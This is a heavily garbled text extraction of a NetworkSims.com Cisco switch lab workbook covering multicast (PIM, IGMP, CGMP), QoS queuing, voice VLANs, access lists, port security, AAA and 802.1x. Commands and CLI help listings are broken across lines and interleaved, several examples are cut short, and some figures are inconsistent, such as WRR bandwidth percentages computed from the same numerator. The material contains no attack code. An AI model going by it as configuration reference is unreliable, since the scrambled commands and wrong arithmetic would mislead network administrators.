Objectives

Define an auto-RP.
Example
> enable
Switch# config t
Switch(config)# access-list 6 permit 19.10.11.12
Switch(config)# ip pim rp-announce-filter ?
group-list Group address access-list
rp-list
RP address access-list
Switch(config)# ip pim rp-announce-filter rp-list ?
<1-99> Access-list reference for RP
WORD
Switch(config)# ip pim rp-announce-filter rp-list 6 ?
<cr>
Switch(config)# ip pim rp-announce-filter rp-list 6 group-list ?
NetworkSims.com
265
<1-99> Access-list reference for group

WORD
Switch(config)# ip pim rp-announce-filter rp-list 6 group-list 5

Area: Switches IP Multicast (PIM)
Outline
IP Mulitcast can use serveral different types of protocols, such as PIM, DVMRP, IGRP and
CGMP. This tutorial outlines the configuration of PIM.
Objectives
Define PIM.

# config t
(config)# int fa0/1
(config-if)# ip pim version 2
(config-if)# ip pim dense-mode
(config-if)# ip pim bsr-border
(config-if)# ip multicast boundary 11
(config-if)# exit
(config)#
(config)#
(config)#
(config)#
(config)#
ip
ip
ip
ip
ip
pim
pim
pim
pim
pim
rp-address 192.168.1.1 10
send-rp-announce fa0/1 scope 30 group-list 5
accept-rp 1.2.3.4 10
send-rp-discovery scope 10
rp-announce-filter rp-list 2 group-list 1
Example
# config t
(config)# int fa0/1
(config-if)# ip pim ?
bsr-border
Border of PIM domain
dense-mode
Enable PIM dense-mode operation
nbma-mode
Use Non-Broadcast Multi-Access (NBMA) mode on interface
neighbor-filter
PIM peering filter
query-interval
PIM router query interval
sparse-dense-mode Enable PIM sparse-dense-mode operation
sparse-mode
Enable PIM sparse-mode operation
version
PIM version
NetworkSims.com
266
<cr>
(config-if)# ip pim sparse-mode
(config-if)# ip pim version ?
(config-if)# ip pim version 2
(config-if)# ip pim bsr-border
(config-if)# ip multicast ?
boundary
Boundary for administratively scoped multicast addresses
helper-map
Broadcast to Multicast map OR Multicast to Broadcast map
rate-limit
Rate limit multicast data packets
ttl-threshold TTL threshold for multicast packets
(config-if)# ip multicast boundary ?
<1-99>
Access-list number
<1300-1999> <access-list> (expanded range)
WORD
(config-if)# ip multicast boundary 10
(config-if)# exit
(config)# ip pim ?
accept-register
accept-rp
autorp
bsr-candidate
register-rate-limit
rp-address
rp-announce-filter
rp-candidate
send-rp-announce
send-rp-discovery
spt-threshold
ssm

RP accept filter
Rate limit for PIM data registers
(config)# ip pim rp-address ?

A.B.C.D IP address of Rendezvous-point for group
(config)# ip pim rp-address 192.168.1.1 ?
<1-99>
WORD
override
Overrides Auto RP messages
<cr>
(config)# ip pim rp-address 192.168.1.1 10
(config)# ip pim send-rp-announce fa0/1 ?
(config)# ip pim send-rp-announce fa0/1 ?
scope RP announcement scope
(config)# ip pim send-rp-announce fa0/1 scope ?
<1-255> TTL of the RP announce packet
(config)# ip pim send-rp-announce fa0/1 scope 30 ?
group-list Group access-list
NetworkSims.com
267
interval
<cr>
RP announcement interval
(config)# ip pim send-rp-announce fa0/1 scope 30 group-list ?

<1-99> Access-list reference for multicast groups
WORD
(config)# ip pim send-rp-announce fa0/1 scope 30 group-list 5 ?
interval RP announcement interval
<cr>
(config)# ip pim send-rp-announce fa0/1 scope 30 group-list 5
(config)# ip pim accept-rp ?
A.B.C.D IP address of RP for group
auto-rp only RP-mapping from Auto-RP
(config)# ip pim accept-rp 1.2.3.4 ?
<1-99>
WORD
<cr>
(config)# ip pim accept-rp 1.2.3.4 10
(config)# ip pim send-rp-discovery ?
Async
Async interface
BVI
Dialer
Dialer interface
FastEthernet
GigabitEthernet
Lex
Lex interface
Loopback
Loopback interface
Multilink
Null
Null interface
Port-channel
Tunnel
Tunnel interface
Virtual-Template
Vlan
Catalyst Vlans
scope
Scope of the RP discovery packets
(config)# ip pi send-rp-d s ?
<1-255> TTL
(config)# ip pi send-rp-d scope 10
(config)# ip pim rp-ann ?
rp-list
RP address access-list
(config)# ip pim rp-ann rp- ?
<1-99> Access-list reference for RP
WORD
(config)# ip pim rp-ann rp- 10 ?
<cr>
(config)# ip pim rp-ann rp- 10 gr ?
<1-99> Access-list reference for group
WORD
NetworkSims.com
268
(config)# ip pim rp-announce-filter rp-list 10 group-list 1

Area: Switches IGMP
Outline
This challenge defines some IGMP parameters on interfaces.
Objectives
Define IGMP.

# config t
(config)# int fa0/1
(config-if)# ip igmp join-group 224.0.0.1
(config-if)# ip igmp querier-timeout 10
(config-if)# ip igmp query-interval 10
(config-if)# ip igmp query-max-response-time 10
(config-if)# ip igmp version 2
Notes
# config t
(config)# int fa0/1
(config-if)# ip igmp ?
access-group
helper-address
immediate-leave
join-group
last-member-query-interval
querier-timeout
query-interval
query-max-response-time
static-group
tcn
unidirectional-link
v3lite
version
IGMP group access group

IGMP helper address
Leave groups immediately without sending last
member query, use for one host network only
IGMP join multicast group
IGMP last member query interval
IGMP previous querier timeout
IGMP host query interval
IGMP max query response value
IGMP static multicast group
IGMP TCN configuration
IGMP unidirectional link multicast routing
Enable/Disable IGMPv3 Lite
IGMP version
(config-if)# ip igmp jo ?
A.B.C.D IP group address
NetworkSims.com
269
(config-if)# ip igmp jo 224.0.0.1

(config-if)# ip igmp querier- ?
<60-300> timeout value in seconds
(config-if)# ip igmp querier- 10
(config-if)# ip igmp query-m ?
<1-25> query response value in seconds
(config-if)# ip igmp query-m 10
(config-if)# ip igmp ve ?
(config-if)# ip igmp ve 2

Area: Switches IGMP: Controlling access to IP Multicast Groups
Outline
This challenge defines a mulitcast ACL, and restricts IP Multicast.
Objectives
Define IGMP restriction.

# config t
(config)# access-list 101 deny host 225.5.5.5 0.0.0.0
(config)# access-list 101 permit any any
(config)# int fa0/1
(config-if)# ip igmp access-group 101
(config-if)# ip igmp join-group 224.0.0.1
(config-if)# ip igmp querier-timeout 10
(config-if)# ip igmp query-interval 10
(config-if)# ip igmp query-max-response-time 10
(config-if)# ip igmp version 2
Notes
# config t
(config)# access-list 101 deny host 225.5.5.5 0.0.0.0
(config)# access-list 101 permit any any
(config)# int fa0/1
NetworkSims.com
270
(config-if)# ip igmp ?
access-group
helper-address
immediate-leave
join-group
last-member-query-interval
querier-timeout
query-interval
query-max-response-time
static-group
tcn
unidirectional-link
v3lite
version
(config-if)#
(config-if)#
(config-if)#
(config-if)#
(config-if)#
(config-if)#
ip
ip
ip
ip
ip
ip
igmp
igmp
igmp
igmp
igmp
igmp
IGMP group access group

IGMP helper address
Leave groups immediately without sending last
member query, use for one host network only
IGMP join multicast group
IGMP last member query interval
IGMP previous querier timeout
IGMP host query interval
IGMP max query response value
IGMP static multicast group
IGMP TCN configuration
IGMP unidirectional link multicast routing
Enable/Disable IGMPv3 Lite
IGMP version
access-group 101
join-group 224.0.0.1
querier-timeout 10
query-interval 10
query-max-response-time 10
version 2

Area: Switches CGMP
Outline
This challenge defines setting up a CGMP server on the switch.
Objectives
Define CGMP servers.

# config t
(config)# int fa0/1
(config-if)# ip cgmp
(config)# int fa0/2
(config-if)# ip cgmp proxy
(config)# int fa0/3
(config-if)# ip cgmp router-only
Notes
# config t
NetworkSims.com
271
(config)# int fa0/1

(config-if)# ip ?
access-group
accounting
address
authentication
bandwidth-percent
bgp
broadcast-address
cef
cgmp
Enable/disable CGMP
dhcp
dvmrp
hello-interval
helper-address
hold-time
igmp
irdp
load-sharing
local-proxy-arp
mask-reply
mrm
mroute-cache
mtu
multicast
ospf
pim
policy
probe
proxy-arp
Enable proxy ARP
rarp-server
redirects
rgmp
Enable/disable RGMP
rip
route-cache
sap
sdr
security
split-horizon
summary-address
unnumbered
unreachables
urd
vrf
wccp
(config-if)# ip cgmp ?
proxy
CGMP for hosts and proxy for multicast routers
router-only CGMP proxy for multicast routers only
<cr>
(config)# int fa0/2
(config)# int fa0/3

NetworkSims.com
272
Outline
This challenge involves the using IGMP snooping.
Objectives
Defines VLANs.
Enable IGMP snooping.
Example
> en
(vlan)# vlan database
(vlan)# ?
VLAN database editing buffer manipulation commands:
abort Exit mode without applying the changes
apply Apply current changes and bump revision number
exit
no
reset Abandon current changes and reread current database
show
Show database information
vlan
Add, delete, or modify values associated with a single VLAN
vtp
Perform VTP administrative functions.
(vlan)# vlan ?
<1-1005> ISL VLAN index
(vlan)# vlan
are
backupcrf
bridge
media
mtu
name
parent
ring
said
state
ste
stp
tb-vlan1
tb-vlan2
1 ?
IEEE 802.10 SAID
if none)
if none)
<cr>
(vlan)#
WORD
(vlan)#
(vlan)#
vlan 1 name ?
The ascii name for the VLAN
vlan 1 name edinburgh
vlan 2 name glasgow
NetworkSims.com
273
(vlan)# exit
# config t
(config)# ip igmp snooping ?
(config)# ip igmp snooping vlan 1 immediate-leave
(config)# ip igmp snooping vlan 2 immediate-leave
(config)# exit
# show ip igmp snoop
Global IGMP Snooping configuration:
----------------------------------IGMP snooping
: Enabled
IGMPv3 snooping (minimal) : Enabled
Report suppression
: Enabled
TCN solicit query
: Disabled
TCN flood query count
: 2
Vlan 1:
-------IGMP snooping
Immediate leave
Multicast router learning mode
Source only learning age timer
CGMP interoperability mode
:
:
:
:
:
Enabled
Enabled
pim-dvmrp
10
IGMP_ONLY
Switch(config-vlan)#?
are
backupcrf
bridge
exit
media
mtu
name
no
parent
remote-span
ring
said
IEEE 802.10 SAID
shutdown
state
ste
stp
tb-vlan1
zero if none)
tb-vlan2
zero if none)
----------------
NetworkSims.com
274
Switch# sh env
all
fan
power
rps
temperature
?
Show
Show
Show
Show
Show
all environment status

fan status
power supply status
RPS status
temperature status
Switch# sh env all

FAN is OK
TEMPERATURE is OK
POWER is OK
RPS is NOT PRESENT
Switch# sh env fan
FAN is OK
Switch# sh env p
POWER is OK
Switch# sh env r
RPS is NOT PRESENT
Switch# sh env t
TEMPERATURE is OK

Unit 7: Multicast

Outline
This challenge involves the configuration of QoS.
Objectives
Define interesting traffic with an ACL.

Define QoS parameters.
Example
NetworkSims.com
275
> en
# config t
0.0.255.255
(config-cmap)# ?
QoS class-map configuration commands:
description Class-Map description
exit
Exit from QoS class-map configuration mode
match
classification criteria
no
Negate or set default values of a command
rename
Rename this class-map
(config-cmap)# match ?
access-group
Access group
any
Any packets
class-map
Class map
destination-address Destination address
input-interface
Select an input interface to match
ip
IP specific values
mpls
Multi Protocol Label Switching specific values
not
Negate this match result
protocol
Protocol
source-address
Source address
vlan
VLANs to match
(config-cmap)# match ac ?
<1-2699> Access list index
name
Named Access List
(config-cmap)# exit
(config-pmap)# ?
QoS policy-map configuration commands:
class
policy criteria
description Policy-Map description
exit
Exit from QoS policy-map configuration mode
no
rename
Rename this policy-map
(config-pmap-c)# ?
QoS policy-map class configuration commands:
bandwidth Bandwidth
exit
Exit from QoS class action configuration mode
no
trust
Set trust value for the class
<cr>
police
Police
set
Set QoS values
(config-pmap)# exit
(config)# int fa0/1
(config-if)# service-policy ?
history Keep history of QoS metrics
input
Assign policy-map to the input of an interface
NetworkSims.com
276
output
Assign policy-map to the output of an interface
Switch(config-if)# se o ?
WORD policy-map name
Explanation
2Mbps:
Class
map
Identify traffic
characteristic
Policy
map
Service
policy
Define the
policy for the
traffic
Apply the
policy to
an interface
# policy-map pmap
# class-map cmap
# int s0
Ref:

Outline
This challenge involves the configuration of Weighted RR (WRR).
> CCNP ONT Area: Unit 4: Congestion Management and Queuing
Objectives
NetworkSims.com
277
Enable QoS globally (mls qos).

Define Layer 3 operation (no switchport).
Define WRR.
Example
(config)# mls qos
(config)# int fa0/1
(config-if)# mls ?
qos qos command keyword
(config-if)# mls qos ?
cos
Configure interface COS parameters
dscp-mutation Apply DSCP-DSCP map to DSCP trusted port
monitor
Collect QoS statistics
trust
Configure trust state of interface
(config-if)# mls qos trust ?
cos
Classify by packet COS
device
trusted device class
dscp
Classify by packet DSCP
ip-precedence Classify by packet IP precedence
<cr>
(config-if)# mls qos trust cos
(config-if)# priority-queue ?
out egress priority queue
(config-if)# priority-queue out
(config-if)# wrr-queue ?
bandwidth
Configure WRR bandwidth
cos-map
Configure cos-map for a queue id
min-reserve Configure min-reserve level
(config-if)# wrr-queue bandwidth ?
<1-65536> enter bandwidth weight for qid 1
(config-if)#
<1-65536>
(config-if)#
<1-65536>
(config-if)#
<1-65536>
(config-if)#
wrr-queue bandwidth 3 ?
enter bandwidth weight for
wrr-queue bandwidth 3 8 ?
wrr-queue bandwidth 3 8 10
wrr-queue bandwidth 3 8 10
qid 2
qid 3
?
qid 4
12
In this case the bandwidth is:

Queue 1: 3/(3+8+10+12) = 9.1%
Queue 2: 3/(3+8+10+12) = 24.2%
Queue 3: 3/(3+8+10+12) = 30.3%
Queue 4: 3/(3+8+10+12) = 36.4%
NetworkSims.com
278
(config-if)# wrr-queue cos-map ?

<1-4> enter cos-map queue id
(config-if)# wrr-queue cos-map 1 ?
<0-7> 8 cos values separated by spaces
(config-if)# wrr-queue cos-map 3 4 5
(config-if)# wrr-queue cos-map 1 0 1 2 4
Queue 1 has CoS of 0, 1, 2 and 4 allocated to it

Queue 3 has CoS of 4 and 5 allocated to it.
(config-if)# wrr-queue random-detect 1 max-threshold 50 100
(config-if)# wrr-queue random-detect 3 max-threshold 80 100
Queue 1 has a min threshold of 50% and a max of 100%

Queue 3 has a min threshold of 80% and a max of 100%

Outline
This challenge involves the configuration of a priority queue (PQ) which has four queues:
high, medium, normal and low.
Objectives
Define queue limits

Define protocols to go into queues.
Apply PQ.
Overview
(config)# priority-list 1 q 20 40 60 80
(config)# priority-list 1 protocol http high
(config)# priority-list 1 protocol ipx low
(config)# int fa0/1
(config-if)# priority-group 1
Example
(config)# priority-list ?
<1-16> Priority list number
(config)# priority-list 1 ?
default
Set priority queue for unspecified datagrams
interface
NetworkSims.com
279
protocol
queue-limit Set queue limits for priority queues
(config)# priority-list 1 q ?
<0-32767> High limit
(config)# priority-list 1 q 20 ?
<0-32767> Medium limit
(config)# priority-list 1 q 20 40 ?
<0-32767> Normal limit
(config)# priority-list 1 q 20 40 60 ?
<0-32767> Lower limit
(config)# priority-list 1 q 20 40 60 80 ?
<cr>
(config)# priority-list 1 q 20 40 60 80
(config)# prio 1 p ?
aarp
AppleTalk ARP
appletalk
AppleTalk
arp
IP ARP
bridge
Bridging
bstun
Block Serial Tunnel
cdp
clns
ISO CLNS
clns_es
ISO CLNS End System
clns_is
ISO CLNS Intermediate System
cmns
ISO CMNS
compressedtcp
Compressed TCP (VJ)
decnet
DECnet
decnet_node
DECnet Node
decnet_router-l1 DECnet Router L1
dlsw
Data Link Switching (Direct encapsulation only)
http
HTTP
ip
IP
ipv6
IPV6
ipx
Novell IPX
llc2
llc2
pad
PAD links
pppoe
PPP over Ethernet
qllc
qllc protocol
rsrb
Remote Source-Route Bridging
snapshot
stun
Serial Tunnel
(config)# priority-list 1 protocol http ?
high
medium
normal
low
(config)# priority-list 1 protocol http high
(config)# priority-list 1 protocol ipx low
(config)# int fa0/1
NetworkSims.com
280

Outline
This challenge involves the configuration of a custom queue (CQ). Up to 16 queues can be
configured.
Objectives
Define queues.
Apply CQ.
Overview
(config)# queue-list 1 protocol ip 1
(config)# queue-list 1 queue 1 limit
(config)# int vlan1
(config-if)# custom-queue-list 1
tcp www
udp rip
40
40
80
Example
default
interface
protocol
queue
stun
Switch(config)#queue-list 1 protocol ?
arp
IP ARP
bridge
Bridging
cdp
ip
IP
Switch(config)# queue-list 1 protocol ip ?
<0-16> queue number
Switch(config)# queue-list 1 protocol ip 1 ?
gt
NetworkSims.com
281
list
lt
tcp
udp
(config)# queue-list 1 protocol ip 1 tcp ?
<0-65535>
Port number
bgp
Border Gateway Protocol (179)
chargen
Character generator (19)
cmd
Remote commands (rcmd, 514)
daytime
Daytime (13)
discard
Discard (9)
domain
Domain Name Service (53)
echo
Echo (7)
exec
Exec (rsh, 512)
finger
Finger (79)
ftp
File Transfer Protocol (21)
ftp-data
FTP data connections (used infrequently, 20)
gopher
Gopher (70)
hostname
NIC hostname server (101)
ident
Ident Protocol (113)
irc
Internet Relay Chat (194)
klogin
Kerberos login (543)
kshell
Kerberos shell (544)
login
Login (rlogin, 513)
lpd
Printer service (515)
nntp
Network News Transport Protocol (119)
pop2
Post Office Protocol v2 (109)
pop3
smtp
Simple Mail Transport Protocol (25)
sunrpc
syslog
Syslog (514)
tacacs
talk
Talk (517)
telnet
Telnet (23)
time
Time (37)
uucp
Unix-to-Unix Copy Program (540)
whois
Nicname (43)
www
World Wide Web (HTTP, 80)
(config)# queue-list 1 protocol ip 2 tcp www
(config)# queue-list 1 protocol ip 1 u ?
<0-65535>
Port number
biff
bootpc
bootps
discard
Discard (9)
dnsix
domain
echo
Echo (7)
isakmp
Internet Security Association and Key Management Protocol
(500)
mobile-ip
nameserver
NetworkSims.com
282

netbios-ns
netbios-ss
ntp
rip
snmp
snmptrap
SNMP Traps (162)
sunrpc
syslog
System Logger (514)
tacacs
talk
Talk (517)
tftp
time
Time (37)
who
xdmcp
X Display Manager Control Protocol (177)
(config)# que 1 queue ?
<0-16> queue number
(config)# que 1 q 1 ?
byte-count Specify size in bytes of a particular queue
limit
Set queue entry limit of a particular queue
(config)# que 1 q 1 limit ?
<0-32767> number of queue entries
(config)# que 1 q 1 l 40 ?
<cr>
(config)# que 1 q 1 l 40
(config-if)# custom-queue-list ?
<1-16> Custom queue list number

Outline
This challenge involves configuring Auto QoS on a switch.
Objectives
Define Auto QoS
Example
NetworkSims.com
283
> en
# config t
(config)# cdp run
(config-vlan)# exit
(config-vlan)# exit
(config)# int fa0/1
access
block
broadcast
host
Set port host
mode
multicast
native
trunking mode
nonegotiate
interface
priority
protected
pruning
mode
trunk
unicast
voice
<cr>
(config-if)# switchport voice ?
vlan Vlan for voice traffic
(config-if)# switchport voice vlan ?
<1-4094> Vlan for voice traffic
dot1p
Priority tagged on PVID
none
Don't tell telephone about voice vlan
untagged Untagged on PVID
(config-if)# switchport voice vlan 20
(config-if)# au ?
qos Configure AutoQoS
(config-if)# auto qos ?
voip Configure AutoQoS for VoIP
(config-if)# auto qos voip ?
cisco-phone Trust the QoS marking of Cisco IP Phone
trust
Trust the COS marking
(config-if)# auto qos voip cisco-phone
(config-if)# exit
NetworkSims.com
284
Note:
For Auto QoS VoIP, CDP needs to be enabled.

Area: Switches Voice VLAN
Outline
This challenge involves the configuring of MLS for Voice in 802.1P priority-tagged frames.
Objectives
Define MLS.
Apply to FA0/1.
Define 802.1P frames.

> enable
# config t
(config)# mls qos
(config)# int fa0/1
(config-if)# switchport voice vlan dot1p
Example
> enable
# config t
(config)# mls ?
aclmerge Modify behavior of ACL merge
qos
QoS parameters
(config)# mls qos
(config-if)# mls ?
(config-if)# mls
cos
dscp-mutation
monitor
trust
(config-if)# mls
cos
device
dscp
ip-precedence
qos ?
Apply DSCP-DSCP map to DSCP trusted port
qos trust ?
Classify by packet IP precedence
NetworkSims.com
285
<cr>
dot1p
none
(config-if)# switchport voice vlan dot1p

Outline
This challenge involves the configuring of MLS for Voice where the CoS value that is
received is overwritten with a new value.
Objectives
Define MLS.
Define the routing for 802.1Q frames.
Apply to FA0/1.
Define the CoS value 0 lowest priority, 7 highest priority.

# config t
(config-vlan)# exit
(config)# mls qos
(config)# int fa0/1
(config-if)# switchport priority extended cos 3
Example
> enable
# config t
(config)# mls ?
qos
QoS parameters
(config)# mls qos
(config)# int fa0/1
NetworkSims.com
286
(config-if)# switchport priority extended ?

cos
Override 802.1p priority of devices on appliance
trust Trust 802.1p priorities of devices on appliance
(config-if)# switchport priority extended cos ?
<0-7> Priority for devices on appliance
(config-if)# switchport priority extended cos 3 ?
<cr>
(config-if)# switchport priority extended cos 3
(config-if)# priority-queue out ?
<cr>

Outline
This challenge involves the configuring the switch so that the IP phone trusts the CoS value.
Objectives
Define MLS.
Define the routing for 802.1Q frames.
Apply to FA0/1.

# config t
(config-vlan)# exit
(config)# mls qos
(config)# int fa0/1
(config-if)# switchport extend trust
Example
> enable
# config t
(config)# mls ?
qos
QoS parameters
(config)# mls qos
NetworkSims.com
287
(config)# int fa0/1

(config-if)# switchport priority extended ?
cos
Override 802.1p priority of devices on appliance
trust Trust 802.1p priorities of devices on appliance
(config-if)# switchport extend trust

Unit 8: QoS

Outline
This challenge involves the configuration of an access-class.
Objectives
Setup an access-list for a single access to the Web server.

Apply the access-list to the Web server.
Example
> en
# config t
(config)# access-list 9 permit 193.91.79.4
(config)# ip http access-class ?
<1-99> Access list number

NetworkSims.com
288
Outline
This challenge involves the configuration to deny access for a single host to the Web server.
Objectives
Define an access-list which denies a single host.

Apply the access-list onto the Web server.
Example
> en
# config t
(config)# access-list 11 deny 192.1.179.24

Outline
This challenge involves the configuration which permits a single host access to a Telnet
server.
Objectives
Define an access-list which permits a single host access to the Telnet server.
Apply the access-list onto the Telnet server.
Example
# config t
(config-line)# access-list ?
<1-199>
IP access list
NetworkSims.com
289
WORD
Access-list name
(config-line)# access-list 8 ?
in
Filter incoming connections
out Filter outgoing connections
(config-line)# access-list 8 in

Outline
This challenge involves the configuration which denies a single host access a Telnet server.
Objectives
Define an access-list which denies a single host access to a Telnet server.

Apply the access-list to the Telnet server.
Example
# config t
(config-line)# access-list ?
<1-199>
IP access list
WORD
Access-list name
(config-line)# access-list 8 ?
in
(config-line)# access-list 8 in

Outline
This challenge involves the configuration of an restriction on a user.
Objectives
Define a single host access.

Link the access to a user.
NetworkSims.com
290
Example
> en
# config t
(config)# username david ?
access-class
autocommand
callback-line
callback-rotary
dnis
nocallback-verify
noescape
nohangup
nopassword
password
privilege
secret
user-maxlinks
(config)# username david access-class ?
<1-199>
Access-class number
<1300-2699> Expanded Access-class number
(config)# username david access-class 6
(config)# username anne ?
access-class
autocommand
callback-line
callback-rotary
dnis
nocallback-verify
noescape
nohangup
nopassword
password
privilege
secret
user-maxlinks
(config)# username anne nopassword

Outline
This challenge involves the configuration of switchport restrictions.
Objectives
Define port-security.
NetworkSims.com
291
Example
> en
# config t
(config)# int fa0/1
access
block
broadcast
host
Set port host
mode
multicast
native
trunking mode
nonegotiate
interface
priority
protected
pruning
mode
trunk
unicast
voice
<cr>
(config-if)# switchport mode ?
access
Set trunking mode to ACCESS unconditionally
dot1q-tunnel Set trunking mode to DOT1Q TUNNEL unconditionally
dynamic
Set trunking mode to dynamically negotiate access or trunk mode
trunk
Set trunking mode to TRUNK unconditionally
(config-if)# switchport port-security violation ?
protect
Security violation protect mode
restrict Security violation restrict mode
shutdown Security violation shutdown mode
(config-if)# switchport port-security violation shutdown
(config-if)# switchport port-security ?
aging
maximum
Max secure addresses
violation
Security violation mode
<cr>
(config-if)# switchport port-security mac-address ?
H.H.H
48 bit mac address
(config-if)# switchport port-security mac-address 00e0.4e3d.a1bb

Outline
This challenge involves the configuration of a single host access to SNMP.
Objectives
NetworkSims.com
292
Define an access-list which permits a single host.

Apply the access-list onto SNMP restrictions.
Example
# config t
(config)# snmp-server community fries ?
<1-99>
Std IP accesslist allowing access with this community string
<1300-1999> Expanded IP accesslist allowing access with this community
string
ro
Read-only access with this community string
rw
Read-write access with this community string
view
Restrict this community to a named MIB view
<cr>
(config)# snmp-server community fries rw ?
<1-99>
string
<cr>
(config)# snmp-server community fries rw 6

Outline
Objectives
Define AAA.
Example
> enable
# config t
arap
banner
dot1x
Set authentication lists for IEEE 802.1x.
enable
fail-message
login
NetworkSims.com
293
nasi
ppp
WORD
enable
group
line
local
local-case
none

Use Server-group
Use case-sensitive local username authentication.
NO authentication.

Or
> enable
# config t
(config)# aaa authen login default group ?
WORD
Server-group name
radius
Use list of all Radius hosts.
tacacs+ Use list of all Tacacs+ hosts.


Outline
Objectives
Define AAA.
Example
> enable
# config t
NetworkSims.com
294
attribute
authorization
challenge-noecho

Access-Challenge
configure-nas
deadtime
directed-request
domain-stripping
host
key
local
password
retransmit
timeout
unique-ident
vsa
(config)# aaa ?
accounting
authorization
configuration
nas
new-model
OLD commands.)
processes
arap
banner
enable
fail-message
login
nasi
ppp
WORD
enable
group
Use Server-group
line
local
none
NO authentication.
arap
banner
enable
fail-message
login
NetworkSims.com
295
nasi
ppp
WORD
commands
exec
network
reverse-access
WORD
enable
group
Use Server-group
line
local

Outline
Objectives
Define AAA.
Example
> enable
# config t
(config)# tacacs-server ?
administration
Start tacacs+ deamon handling administrative messages
attempts
Number of login attempts via TACACS
directed-request
Allow user to specify tacacs server to use with `@server'
dns-alias-lookup
Enable IP Domain Name System Alias lookup for TACACS
servers
extended
Enable extended TACACS
host
Specify a TACACS server
NetworkSims.com
296
key
last-resort
optional-passwords
Set TACACS+ encryption key.

Define TACACS action if no server responds
The first TACACS request can be made without password
verification
packet
Modify TACACS+ packet options
retransmit
Search iterations of the TACACS server list
timeout
Time to wait for a TACACS server to reply
(config)# tacacs-server h ?
Hostname or A.B.C.D IP address of TACACS server
<cr>
(config)# tacacs-server key ?
LINE Encryption key string

Outline
Objectives
Define AAA.
Define privileges.
Example
> enable
# config t
(config)# privilege ?
cns_connect_intf_config
config-rtr-http
configure
exec
interface
interface
ipenacl
ipsnacl
line
mac-enacl
map-class
map-list
NetworkSims.com
CNS Connect Intf Info Mode

RTR HTTP raw request Configuration
Global configuration mode
Exec mode
Interface configuration mode
Interface range configuration mode
IP named extended access-list configuration mode
IP named simple access-list configuration mode
Line configuration mode
MAC named extended ACL configuration mode
Map class configuration mode
Map list configuration mode
297
mstp_cfg
MSTP configuration mode
null-interface
Null interface configuration mode
preauth
AAA Preauth definitions
rtr
RTR Entry Configuration
sg-radius
Radius Server-group Definition
sg-tacacs+
Tacacs+ Server-group Definition
template
Template configuration mode
vc-class
VC class configuration mode
Explanation

access-enable
clear
connect
disable
disconnect
enable
exit
help
lock
login
logout
name-connection
ping
rcommand
resume
show
systat
telnet
terminal
traceroute
tunnel
where
NetworkSims.com

Reset functions
Exit from the EXEC
Lock the terminal
Exit from the EXEC
Send echo messages
298
Thus:
(config)#
(config)#
(config)#
(config)#
(config)#
(config)#
privilege
privilege
privilege
privilege
privilege
privilege

exec level 7 ping

Outline
This challenge involves enabling 802.1x authentication.
Objectives
Define AAA
Enable 802.1x.
Define re-authentication.
Example
> en
# config t
(config)# int fa0/1
(config-if)# dot1x ?
default
Configure Dot1x with default values for this port
host-mode
Set the Host mode for 802.1x on this interface
max-req
Max No.of Retries
port-control
set the port-control value
reauthentication Enable or Disable Reauthentication for this port
timeout
Various Timeouts
(config-if)# dot1x port-control ?
auto
PortState will be set to AUTO
force-authorized
PortState set to Authorized
force-unauthorized PortState will be set to UnAuthorized
(config-if)# dot1x port-control auto
(config-if)# dot1 reauthentication ?
<cr>
(config-if)# dot1x re-authentication
(config-if)# dot1 timeout ?
quiet-period
QuietPeriod in Seconds
NetworkSims.com
299
reauth-period
server-timeout
supp-timeout
tx-period
Time after which an automatic re-authentication should be

initiated
Timeout for Radius Retries
Timeout for Supplicant retries
Timeout for Supplicant Re-transmissions
(config-if)# dot1x timeout reauth-period ?

<1-65535> Enter a value between 1 and 65535
(config-if)# dot1x timeout reauth-period 180

Outline
This challenge involves enabling 802.1x authentication with authentication from an AAA
server.
Objectives
Enable AAA.
Define the Radius server.
radius server.
Enable 802.1x.
Define Dot1x timeouts.

(config)# aaa accounting connection default start-stop group radius
(config)# aaa accounting network default start-stop group radius
(config)# aaa authentication dot1x default group radius local
(config)# dot1x system-auth-control
(config)# radius-server host 10.0.0.1 auth-port 1812 key test
(config)# int fa0/1
(config-if)# dot1x timeout tx-period 40
(config-if)# dot1x timeout quiet-period 10
(config-if)# dot1x max-req 3
Example
> en
# config t
NetworkSims.com
300
(config)# aaa authen dot1x ?

WORD
(config)# aaa
enable
group
line
local
local-case
none
authentication dot1x default ?

Use Server-group
NO authentication.
(config)# aaa authentication dot1x default ?

enable
group
Use Server-group
line
local
none
NO authentication.
(config)# aaa authentication dot1x default group ?
WORD
Server-group name
radius
(config)# aaa accounting network ?
WORD
Named Accounting list.
default The default accounting list.
(config)# aaa
none
start-stop
stop-only
wait-start
accounting network default ?

No accounting.
Record start and stop without waiting
Record stop when service terminates.
Same as start-stop but wait for start-record commit.
(config)# aaa accounting network d star ?

group Use Server-group
(config)# aaa accounting net d star g ?
WORD
Server-group name
radius
(config)# aaa accounting connection ?
WORD
(config)# aaa
none
start-stop
stop-only
wait-start
accounting connection default ?

No accounting.
(config)# aaa accounting connection default start-stop ?

(config)# aaa accounting connection default start-stop group ?
WORD
Server-group name
radius
(config)# aaa accounting connection default start-stop group radius ?
<cr>
NetworkSims.com
301

(config)# dot1x ?
system-auth-control Enable or Disable SysAuthControl
(config)# radius-server host ?
Hostname or A.B.C.D IP address of RADIUS server
(config)# radius-server host 10.0.0.1 ?
acct-port
UDP port for RADIUS accounting server (default is 1646)
alias
1-8 aliases for this server (max. 8)
auth-port
UDP port for RADIUS authentication server (default is 1645)
backoff
Retry backoff pattern (Default is retransmits with constant
delay)
key
per-server encryption key (overrides default)
non-standard Parse attributes that violate the RADIUS standard
retransmit
Specify the number of retries to active server (overrides
default)
timeout
Time to wait for this RADIUS server to reply (overrides
default)
<cr>
(config)# radius-server host 10.0.0.1 au ?
<0-65536> Port number
(config)# radius-server host 10.0.0.1 au 1812 ?
acct-port
auth-port
key
retransmit
default)
timeout
default)
<cr>
(config)# radius-server host 10.0.0.1 auth-port 1812 key ?
LINE Text for this server's key
(config)# int fa0/1
default
host-mode
max-req
Max No.of Retries
port-control
timeout
Various Timeouts
(config-if)# dot1x timeout ?
quiet-period
reauth-period
initiated
server-timeout Timeout for Radius Retries
supp-timeout
tx-period
NetworkSims.com
302
(config-if)# dot1 max-req ?


Outline
This challenge involves the configuration of security of a switch.
Objectives

Example
> enable
# config t
password bert
nopassword
privilege 15
privilege 1
user-maxlinks 2
access-class 9
Explanation

access-enable
clear
connect
disable
disconnect
enable
exit
help
NetworkSims.com

Reset functions
Exit from the EXEC
303
lock
login
logout
name-connection
ping
rcommand
resume
show
systat
telnet
terminal
traceroute
tunnel
where
Lock the terminal

Exit from the EXEC
Send echo messages
Thus:

